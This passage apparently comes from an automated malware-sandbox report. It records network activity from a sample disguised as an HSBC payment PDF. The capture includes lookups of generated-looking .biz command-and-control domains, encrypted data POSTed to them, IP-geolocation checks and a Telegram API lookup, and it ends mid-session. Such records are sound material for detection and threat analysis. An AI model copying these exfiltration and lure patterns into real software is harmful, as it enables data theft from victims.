Dec 13, 2024 15:49:14.480021954 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:14.480273008 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:14.480295897 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:14.600456953 CET	80	49977	13.251.16.150	192.168.2.7
Dec 13, 2024 15:49:14.600485086 CET	80	49977	13.251.16.150	192.168.2.7
Dec 13, 2024 15:49:16.493319035 CET	80	49977	13.251.16.150	192.168.2.7
Dec 13, 2024 15:49:16.497808933 CET	80	49977	13.251.16.150	192.168.2.7
Dec 13, 2024 15:49:16.497853994 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:17.204143047 CET	49977	80	192.168.2.7	13.251.16.150
Dec 13, 2024 15:49:17.325222969 CET	80	49977	13.251.16.150	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 15:47:15.823549986 CET	49761	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:16.578130960 CET	53	49761	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:18.972193003 CET	63764	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:19.516653061 CET	53	63764	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:21.495301962 CET	53568	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:21.633270025 CET	53	53568	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:21.800384998 CET	58341	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:22.349931002 CET	53	58341	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:23.923846960 CET	57491	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:24.396085024 CET	64270	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:24.463725090 CET	53	57491	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:24.536341906 CET	53	64270	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:25.763240099 CET	49242	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:26.179064989 CET	53	49242	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:27.672429085 CET	55246	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:27.896845102 CET	53	55246	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:29.201888084 CET	57130	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:29.599710941 CET	53	57130	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:31.991451025 CET	61230	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:32.017709017 CET	62812	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:32.130836964 CET	53	61230	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:32.365269899 CET	53	62812	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:33.718260050 CET	57941	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:33.955868006 CET	53	57941	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:33.956722975 CET	63846	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:34.514049053 CET	53	63846	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:36.887906075 CET	58950	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:37.110696077 CET	53	58950	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:37.111462116 CET	59280	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:37.334045887 CET	53	59280	1.1.1.1	192.168.2.7
Dec 13, 2024 15:47:37.335685968 CET	55295	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:47:38.225598097 CET	53	55295	1.1.1.1	192.168.2.7
Dec 13, 2024 15:48:22.740703106 CET	62896	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:48:23.485682011 CET	53	62896	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:07.790216923 CET	63744	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:08.351798058 CET	53	63744	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:10.516652107 CET	56131	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:11.512631893 CET	56131	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:12.527359962 CET	56131	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:14.351922035 CET	53	56131	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:14.351933956 CET	53	56131	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:14.351943970 CET	53	56131	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:17.205466032 CET	51470	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:18.202228069 CET	51470	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:19.215120077 CET	51470	53	192.168.2.7	1.1.1.1
Dec 13, 2024 15:49:19.993238926 CET	53	51470	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:19.993251085 CET	53	51470	1.1.1.1	192.168.2.7
Dec 13, 2024 15:49:19.993261099 CET	53	51470	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 15:47:15.823549986 CET	192.168.2.7	1.1.1.1	0x1aeb	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:18.972193003 CET	192.168.2.7	1.1.1.1	0xd53	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.495301962 CET	192.168.2.7	1.1.1.1	0x386d	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.800384998 CET	192.168.2.7	1.1.1.1	0xf1bf	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:23.923846960 CET	192.168.2.7	1.1.1.1	0x56cd	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:24.396085024 CET	192.168.2.7	1.1.1.1	0x2448	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:25.763240099 CET	192.168.2.7	1.1.1.1	0x6710	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:27.672429085 CET	192.168.2.7	1.1.1.1	0xc0c6	Standard query (0)	ww99.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:29.201888084 CET	192.168.2.7	1.1.1.1	0x1478	Standard query (0)	ww12.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:31.991451025 CET	192.168.2.7	1.1.1.1	0xf5e2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:32.017709017 CET	192.168.2.7	1.1.1.1	0x6058	Standard query (0)	ww7.przvgke.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:33.718260050 CET	192.168.2.7	1.1.1.1	0x164f	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:33.956722975 CET	192.168.2.7	1.1.1.1	0xbe9f	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:36.887906075 CET	192.168.2.7	1.1.1.1	0x6a2c	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:37.111462116 CET	192.168.2.7	1.1.1.1	0x6645	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:37.335685968 CET	192.168.2.7	1.1.1.1	0x91c6	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:48:22.740703106 CET	192.168.2.7	1.1.1.1	0x7d3a	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:07.790216923 CET	192.168.2.7	1.1.1.1	0x89ff	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:10.516652107 CET	192.168.2.7	1.1.1.1	0x6cb4	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:11.512631893 CET	192.168.2.7	1.1.1.1	0x6cb4	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:12.527359962 CET	192.168.2.7	1.1.1.1	0x6cb4	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:17.205466032 CET	192.168.2.7	1.1.1.1	0x3de6	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:18.202228069 CET	192.168.2.7	1.1.1.1	0x3de6	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:19.215120077 CET	192.168.2.7	1.1.1.1	0x3de6	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 15:47:16.578130960 CET	1.1.1.1	192.168.2.7	0x1aeb	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:19.516653061 CET	1.1.1.1	192.168.2.7	0xd53	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:21.633270025 CET	1.1.1.1	192.168.2.7	0x386d	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:22.349931002 CET	1.1.1.1	192.168.2.7	0xf1bf	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:24.463725090 CET	1.1.1.1	192.168.2.7	0x56cd	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:24.536341906 CET	1.1.1.1	192.168.2.7	0x2448	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:24.536341906 CET	1.1.1.1	192.168.2.7	0x2448	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:26.179064989 CET	1.1.1.1	192.168.2.7	0x6710	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:26.179064989 CET	1.1.1.1	192.168.2.7	0x6710	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:27.896845102 CET	1.1.1.1	192.168.2.7	0xc0c6	No error (0)	ww99.przvgke.biz		72.52.179.174	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:29.599710941 CET	1.1.1.1	192.168.2.7	0x1478	No error (0)	ww12.przvgke.biz	084725.parkingcrew.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 15:47:29.599710941 CET	1.1.1.1	192.168.2.7	0x1478	No error (0)	084725.parkingcrew.net		76.223.26.96	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:29.599710941 CET	1.1.1.1	192.168.2.7	0x1478	No error (0)	084725.parkingcrew.net		13.248.148.254	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:32.130836964 CET	1.1.1.1	192.168.2.7	0xf5e2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:32.365269899 CET	1.1.1.1	192.168.2.7	0x6058	No error (0)	ww7.przvgke.biz	76899.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 15:47:32.365269899 CET	1.1.1.1	192.168.2.7	0x6058	No error (0)	76899.bodis.com		199.59.243.227	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:33.955868006 CET	1.1.1.1	192.168.2.7	0x164f	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:34.514049053 CET	1.1.1.1	192.168.2.7	0xbe9f	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:37.110696077 CET	1.1.1.1	192.168.2.7	0x6a2c	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:37.334045887 CET	1.1.1.1	192.168.2.7	0x6645	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:47:38.225598097 CET	1.1.1.1	192.168.2.7	0x91c6	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:48:23.485682011 CET	1.1.1.1	192.168.2.7	0x7d3a	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:08.351798058 CET	1.1.1.1	192.168.2.7	0x89ff	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:14.351922035 CET	1.1.1.1	192.168.2.7	0x6cb4	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:14.351933956 CET	1.1.1.1	192.168.2.7	0x6cb4	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:14.351943970 CET	1.1.1.1	192.168.2.7	0x6cb4	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:19.993238926 CET	1.1.1.1	192.168.2.7	0x3de6	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:19.993251085 CET	1.1.1.1	192.168.2.7	0x3de6	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Dec 13, 2024 15:49:19.993261099 CET	1.1.1.1	192.168.2.7	0x3de6	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

pywolwnvd.biz

ssbzmoy.biz

checkip.dyndns.org

cvgrf.biz

npukfztj.biz

przvgke.biz

ww99.przvgke.biz

ww12.przvgke.biz

ww7.przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	54.244.188.177	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:17.421261072 CET	351	OUT	POST /agwftt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:17.421303988 CET	850	OUT	Data Raw: 18 d0 7e 62 a1 11 67 e1 46 03 00 00 09 f1 11 46 e3 94 c8 4c 93 58 a6 08 f6 b8 ba 49 ca c7 8c 22 50 60 49 5d 0f 21 d4 ed c0 9c 81 90 ce 95 34 2c ce a2 fd c6 c1 b8 22 60 e9 4e f7 5f b1 01 f5 2a 8b c1 8a 5c 01 a1 5b e2 e5 af 0e 51 51 98 08 69 4c 79 Data Ascii: ~bgFFLXI"P`I]!4,"`N_*\[QQiLy)Ybk^pzmGj@EUxZ`@7ZnEiR]]]m=/JTbXI^!b2z<?TFS8+Y"kj[Dy{!$r_F'>O%PL;. tM
Dec 13, 2024 15:47:18.948837042 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=2a9e3fc6d4aa96b20bf77f41e11cad75\|8.46.123.189\|1734101238\|1734101238\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	54.244.188.177	80	7288	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:17.990751982 CET	359	OUT	POST /vejjgkofjksncu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 898
Dec 13, 2024 15:47:17.990768909 CET	898	OUT	Data Raw: 76 4e 2e fe 2f ee 31 97 76 03 00 00 c3 47 3d 55 bb 4f 57 c5 16 67 0b 27 71 84 1b 30 99 bb 09 83 81 a7 cf 8b 0e 19 04 d9 5b d9 34 8d 9c 15 b1 f7 27 9c 53 19 a0 29 1b 92 21 bb b8 15 65 a0 49 8c 61 58 97 f3 96 9d c5 4c 41 f2 29 0e 45 61 0f d4 55 7f Data Ascii: vN./1vG=UOWg'q0[4'S)!eIaXLA)EaU*u[\|s&}9]SNN)ZNu/LG69/[\|Vuf;1.iyFP-kCmzZ0x[jco[Ir\s\5z\POT]
Dec 13, 2024 15:47:19.389044046 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=031f2879da5545c841f761818cfaf0e7\|8.46.123.189\|1734101239\|1734101239\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	18.141.10.107	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:19.733642101 CET	352	OUT	POST /lfrkuluoy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:19.733654976 CET	850	OUT	Data Raw: a7 4f da a2 40 f9 c2 79 46 03 00 00 79 ca ab 2b 6f 96 78 21 b6 fe 43 d1 3b 53 a9 49 b8 74 57 85 c7 50 71 4f 6a 9f 55 11 a8 f4 ad f4 2f d5 5e a4 8b df b8 ae 1d f3 fc ab 00 ee 09 ee d8 1e 83 3a e7 4d e8 ce c1 7c 28 94 be d2 85 49 5a e9 44 cc f5 b3 Data Ascii: O@yFy+ox!C;SItWPqOjU/^:M\|(IZD54\|r3iFGg5X2HJiNjjdL[m9J"~;P~0S#PH--C7prvZof2{OA&VA\|fvum
Dec 13, 2024 15:47:21.784295082 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=78b01ad452eb5ee9e24d517ada1ffb92\|8.46.123.189\|1734101241\|1734101241\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49708	18.141.10.107	80	7288	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:19.810775042 CET	356	OUT	POST /ljydopjkwkbil HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 898
Dec 13, 2024 15:47:19.810775042 CET	898	OUT	Data Raw: a9 33 a0 6b 43 bd 3e 22 76 03 00 00 b8 0e 6e 75 a4 ec b3 2d 80 72 f0 8c 2e 33 bc a4 1a 15 cb 1b d0 ba f0 11 01 c9 32 d5 26 90 29 08 b3 e7 4b 14 74 09 2d 87 91 32 cf fe 7f 2d f3 47 53 0c e5 9b a6 ef 22 88 fe 18 49 58 61 95 c8 5f 41 28 9f 66 26 03 Data Ascii: 3kC>"vnu-r.32&)Kt-2-GS"IXa_A(f&LaKcV^1.}Zq\|}?y0"[H8Lws@UT&XV4Q4jbYRv#7sc,iS#XDQ6'41:L/Hd
Dec 13, 2024 15:47:21.852374077 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:21 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c4bee4e3a39407288047b8e0e0fcdef0\|8.46.123.189\|1734101241\|1734101241\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	132.226.8.169	80	7744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:21.761653900 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 15:47:23.843822002 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 15:47:23.849396944 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 15:47:24.343229055 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 15:47:31.468624115 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 15:47:31.983454943 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	54.244.188.177	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:22.514461040 CET	345	OUT	POST /ubwy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:47:22.514481068 CET	850	OUT	Data Raw: 6c ad bc 0c cf e0 51 03 46 03 00 00 ab 55 02 ac fe 68 67 65 45 63 a4 52 bf 4d 7c 3c 83 2f a0 3d 35 35 af 39 64 44 f3 da 13 d8 6c 07 10 7b f6 cf 45 c6 e5 b8 71 22 da 62 b8 4d c7 38 a0 75 0f 80 17 3e 8e cb 77 c5 92 17 e6 bc 44 77 48 4d 57 c0 d9 42 Data Ascii: lQFUhgeEcRM\|</=559dDl{Eq"bM8u>wDwHMWB3\|l,q];sn-y{A7mMiRY,\G^2(6[H{4407mr55iG`7Ia`?lR,^fsQUt=,/cWm&
Dec 13, 2024 15:47:23.908278942 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:47:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=491c5089468e29b6e2aa0d14af9135b7\|8.46.123.189\|1734101243\|1734101243\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49720	44.221.84.105	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:47:24.628628969 CET	350	OUT	POST /edmrjb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
